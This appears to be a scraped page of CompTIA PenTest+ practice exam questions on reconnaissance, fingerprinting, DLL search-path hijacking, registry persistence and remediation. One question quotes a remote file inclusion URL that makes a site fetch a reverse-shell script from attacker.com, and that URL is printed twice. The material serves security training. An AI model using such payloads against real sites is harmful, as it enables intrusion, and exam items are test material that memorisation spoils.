Comptia (PT0-001) Exam Questions And Answers page 20
Which of the following would BEST prevent fence jumping at a facility?
Decrease the distance between the links in the fence.
Add a top guard on the fence that faces away from the facility.
Place video cameras that are angled toward the fence.
Planning and Scoping
Information Gathering and Vulnerability Identification
Which of the following would be the BEST for performing passive reconnaissance on a target s external domain?
Peach
CeWL
OpenVAS
Shodan
Information Gathering and Vulnerability Identification
While conducting information gathering, a penetration tester is trying to identify Windows hosts. Which of the following characteristics would be BEST to use for fingerprinting?
The system responds with a MAC address that begins with 00:0A:3B.
The system responds with port 22 open.
The system responds with a TTL of 128.
The system responds with a TCP window size of 5840.
Information Gathering and Vulnerability Identification
Attacks and Exploits
While monitoring WAF logs, a security analyst discovers a successful attack against the following URL:
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php
Which of the following remediation steps should be taken to prevent this type of attack?
Implement a blacklist.
Block URL redirections.
Double URL encode the parameters.
Stop external calls from the application.
Information Gathering and Vulnerability Identification
Attacks and Exploits
While performing privilege escalation on a Windows 7 workstation, a penetration tester identifies a service that imports a DLL by name rather than an absolute path. To exploit this vulnerability, which of the following criteria must be met?
Permissions not disabled in the DLL
Weak folder permissions of a directory in the DLL search path
Write permissions in the C:\Windows\System32\imports directory
DLL not cryptographically signed by the vendor
Attacks and Exploits
Penetration Testing Tools
While presenting the results of a penetration test to a client's executive team, the Chief Information Security Officer (CISO) asks for remediation advice for a shared local administrator finding. The client is geographically dispersed, and centralized management is a key concern. Which of the following is the BEST remediation to suggest?
Have random and unique credentials per system.
Disable the administrator login from the network.
Use a service account for administrative functions.
Implement a single rotating password for systems.
Attacks and Exploits
Penetration Testing Tools
While trying to maintain persistence on a Windows system with limited privileges, which of the following registry keys should the tester use?
HKEY_CLASSES_ROOT
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CURRENT_CONFIG
Planning and Scoping
Attacks and Exploits
Comments